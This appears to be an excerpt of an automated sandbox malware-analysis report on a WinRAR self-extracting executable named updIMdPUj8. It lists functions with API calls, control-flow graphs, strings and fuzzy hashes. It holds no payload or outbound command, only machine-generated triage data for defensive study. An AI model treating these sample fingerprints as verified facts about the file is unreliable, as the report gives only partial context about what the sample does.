                                                                                                                                                                          control_flow_graph 812 b3a6c2-b3a6df FindResourceW 813 b3a6e5-b3a6f6 SizeofResource 812->813 814 b3a7db 812->814 813->814 815 b3a6fc-b3a70b LoadResource 813->815 816 b3a7dd-b3a7e1 814->816 815->814 817 b3a711-b3a71c LockResource 815->817 817->814 818 b3a722-b3a737 GlobalAlloc 817->818 819 b3a7d3-b3a7d9 818->819 820 b3a73d-b3a746 GlobalLock 818->820 819->816 821 b3a7cc-b3a7cd GlobalFree 820->821 822 b3a74c-b3a76a call b40320 CreateStreamOnHGlobal 820->822 821->819 825 b3a7c5-b3a7c6 GlobalUnlock 822->825 826 b3a76c-b3a78e call b3a626 822->826 825->821 826->825 831 b3a790-b3a798 826->831 832 b3a7b3-b3a7c1 831->832 833 b3a79a-b3a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 b3a7b0 833->834 834->832
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6D5
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6EC
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A703
                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A712
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B3B73D,00000066), ref: 00B3A72D
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B3A73E
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B3A762
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B3A7C6
                                                                                                                                                                            • Part of subcall function 00B3A626: GdipAlloc.GDIPLUS(00000010), ref: 00B3A62C
                                                                                                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B3A7A7
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B3A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                                                          • String ID: PNG
                                                                                                                                                                          • API String ID: 211097158-364855578
                                                                                                                                                                          • Opcode ID: 120564321bb763fb263fc882fc0be5659c982f5e2b40e30991ffaa5b1aa5db13
                                                                                                                                                                          • Instruction ID: 7d9e2864b982be5e5e2d911c6ccd9e8baaac8dc9112e030b9e3fe3f532fc2423
                                                                                                                                                                          • Opcode Fuzzy Hash: 120564321bb763fb263fc882fc0be5659c982f5e2b40e30991ffaa5b1aa5db13
                                                                                                                                                                          • Instruction Fuzzy Hash: 57319E75601702AFC7119F31EC88E1BBBF8EF84B91F240999F84593660EF31DD449AA1
                                                                                                                                                                          Function 00B2A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1029 b2a69b-b2a6bf call b3ec50 1032 b2a6c1-b2a6ce FindFirstFileW 1029->1032 1033 b2a727-b2a730 FindNextFileW 1029->1033 1034 b2a742-b2a7ff call b30602 call b2c310 call b315da * 3 1032->1034 1035 b2a6d0-b2a6e2 call b2bb03 1032->1035 1033->1034 1036 b2a732-b2a740 GetLastError 1033->1036 1042 b2a804-b2a811 1034->1042 1044 b2a6e4-b2a6fc FindFirstFileW 1035->1044 1045 b2a6fe-b2a707 GetLastError 1035->1045 1037 b2a719-b2a722 1036->1037 1037->1042 1044->1034 1044->1045 1047 b2a717 1045->1047 1048 b2a709-b2a70c 1045->1048 1047->1037 1048->1047 1050 b2a70e-b2a711 1048->1050 1050->1047 1052 b2a713-b2a715 1050->1052 1052->1037
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6C4
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6F2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6FE
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A728
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A734
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 42610566-0
                                                                                                                                                                          • Opcode ID: 73a74ba1bfe60d83e1c7754fab15d130c0f127f71174223b92698ded78e710c3
                                                                                                                                                                          • Instruction ID: 8e814407adc61adc10704bedab3e52cff22ba18e9a4399b842ff0f7722873f2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 73a74ba1bfe60d83e1c7754fab15d130c0f127f71174223b92698ded78e710c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 68416C72900225ABCB25DF68DC88AEAB7F8FB48350F1441D6E55EE3250DB346E948F94
                                                                                                                                                                          Function 00B47DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002,00000000), ref: 00B47E0F
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002,00000000), ref: 00B47E16
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B47E28
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 9f2da453e1cd0badc5d8b54e797d35685d23c51c83fdc98327c153cb9d868fb2
                                                                                                                                                                          • Instruction ID: dee7c1e45b2543e9ff1eeabf117a99bcc913419c4c676089c1f41de26d78d96f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2da453e1cd0badc5d8b54e797d35685d23c51c83fdc98327c153cb9d868fb2
                                                                                                                                                                          • Instruction Fuzzy Hash: C8E04631080248ABCF026F20CD09B5A3FEAEB00782B0444D4F8098B232CF36DF52EA80
                                                                                                                                                                          Function 00B2848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: ef2a9e8a0e154dd4899327a7dcd92954d265ec5341d984105de901986bff1bd5
                                                                                                                                                                          • Instruction ID: 8b6b6e2dbc4a57dca1e87288b01578dadecc5f6c0cab1efac6bcf7f6743b60e0
                                                                                                                                                                          • Opcode Fuzzy Hash: ef2a9e8a0e154dd4899327a7dcd92954d265ec5341d984105de901986bff1bd5
                                                                                                                                                                          • Instruction Fuzzy Hash: 47823A70905265AEDF16DF64D891BFABBF9EF15300F0841F9E84D9B142CB315A88CB60
                                                                                                                                                                          Function 00B3B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3B7E5
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3B8D1
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B8EF
                                                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 00B3B902
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3B910
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3B91A
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B3B93D
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B3B960
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 00B3B983
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3B99E
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3B9B1
                                                                                                                                                                            • Part of subcall function 00B3D453: _wcslen.LIBCMT ref: 00B3D47D
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00B3B9B8
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BA24
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B3D4D4: GetDlgItem.USER32(00000068,00B7FCB8), ref: 00B3D4E8
                                                                                                                                                                            • Part of subcall function 00B3D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B3AF07,00000001,?,?,00B3B7B9,00B5506C,00B7FCB8,00B7FCB8,00001000,00000000,00000000), ref: 00B3D510
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3D51B
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3D529
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D53F
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B3D559
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D59D
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B3D5AB
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D5BA
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D5E1
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B543F4), ref: 00B3D5F0
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B3BA68
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B3BA90
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00B3BAAE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BAC2
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000011), ref: 00B3BAF4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B3BB43
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BB7C
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B3BBD0
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00B3BBEA
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B3BC47
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00B3BC6F
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00B3BCB9
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B3BCE2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3BCEB
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BD1E
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3BD7D
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,00B535F4), ref: 00B3BD94
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 00B3BD9D
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B3BDAC
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B3BDBB
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3BE68
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3BEBE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BEE8
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B3BF32
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B3BF4C
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 00B3BF55
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B3BF6B
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 00B3BF85
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00B6A472), ref: 00B3BFA7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B3C007
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3C01A
                                                                                                                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B3C0BD
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00B3C197
                                                                                                                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B3C1D9
                                                                                                                                                                            • Part of subcall function 00B3C73F: __EH_prolog.LIBCMT ref: 00B3C744
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3C1FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 3445078344-2238251102
                                                                                                                                                                          • Opcode ID: 9276ec5b1c56e3d3cd1e4989d138d03f01bc343458e449494ee4d3e842137f62
                                                                                                                                                                          • Instruction ID: 5465edd11f39c51e4663eb03dcafa4d9bb3413b0d32561e0874c003219145c06
                                                                                                                                                                          • Opcode Fuzzy Hash: 9276ec5b1c56e3d3cd1e4989d138d03f01bc343458e449494ee4d3e842137f62
                                                                                                                                                                          • Instruction Fuzzy Hash: 9642D971944254BAEB21ABB49C4AFBE7BECEB01B00F2441D5F644B71E2CFB45A44CB61
                                                                                                                                                                          Function 00B30863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 268 b30863-b30886 call b3ec50 GetModuleHandleW 271 b308e7-b30b48 268->271 272 b30888-b3089f GetProcAddress 268->272 273 b30c14-b30c40 GetModuleFileNameW call b2c29a call b30602 271->273 274 b30b4e-b30b59 call b475fb 271->274 275 b308a1-b308b7 272->275 276 b308b9-b308c9 GetProcAddress 272->276 291 b30c42-b30c4e call b2b146 273->291 274->273 285 b30b5f-b30b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 b308e5 276->279 280 b308cb-b308e0 276->280 279->271 280->279 288 b30c08-b30c0f CloseHandle 285->288 289 b30b8f-b30b9b SetFilePointer 285->289 288->273 289->288 292 b30b9d-b30bb9 ReadFile 289->292 297 b30c50-b30c5b call b3081b 291->297 298 b30c7d-b30ca4 call b2c310 GetFileAttributesW 291->298 292->288 294 b30bbb-b30be0 292->294 296 b30bfd-b30c06 call b30371 294->296 296->288 304 b30be2-b30bfc call b3081b 296->304 297->298 309 b30c5d-b30c7b CompareStringW 297->309 306 b30ca6-b30caa 298->306 307 b30cae 298->307 304->296 306->291 310 b30cac 306->310 311 b30cb0-b30cb5 307->311 309->298 309->306 310->311 313 b30cb7 311->313 314 b30cec-b30cee 311->314 315 b30cb9-b30ce0 call b2c310 GetFileAttributesW 313->315 316 b30cf4-b30d0b call b2c2e4 call b2b146 314->316 317 b30dfb-b30e05 314->317 323 b30ce2-b30ce6 315->323 324 b30cea 315->324 327 b30d73-b30da6 call b24092 AllocConsole 316->327 328 b30d0d-b30d6e call b3081b * 2 call b2e617 call b24092 call b2e617 call b3a7e4 316->328 323->315 326 b30ce8 323->326 324->314 326->314 333 b30df3-b30df5 ExitProcess 327->333 334 b30da8-b30ded GetCurrentProcessId AttachConsole call b43e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00B3087C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B3088E
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B308BF
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B30B69
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B30B83
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B30B93
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00B53C7C,00000000), ref: 00B30BB1
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B30C09
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B30C1E
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B53C7C,?,00000000,?,00000800), ref: 00B30C72
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00B53C7C,00000800,?,00000000,?,00000800), ref: 00B30C9C
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00B53D44,00000800), ref: 00B30CD8
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B30D4A
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B30D96
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • AllocConsole.KERNEL32 ref: 00B30D9E
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00B30DA8
                                                                                                                                                                          • AttachConsole.KERNEL32(00000000), ref: 00B30DAF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B30DC4
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B30DD5
                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00B30DDC
                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 00B30DE7
                                                                                                                                                                          • FreeConsole.KERNEL32 ref: 00B30DED
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B30DF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                          • API String ID: 1207345701-3298887752
                                                                                                                                                                          • Opcode ID: 3bf955cfb45964c7cbc7e77e7818691b52c43099935a89c2dda5122a04c0b5ba
                                                                                                                                                                          • Instruction ID: 77fbac0e1af3301604d6f14e10812b150c7fd14506b461b3153a3e413ea85ee3
                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf955cfb45964c7cbc7e77e7818691b52c43099935a89c2dda5122a04c0b5ba
                                                                                                                                                                          • Instruction Fuzzy Hash: D8D176B20083449BD321AF50D859B9FBBF8EF85B46F5449DDF98597290CBB0864CCB62
                                                                                                                                                                          Function 00B3C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
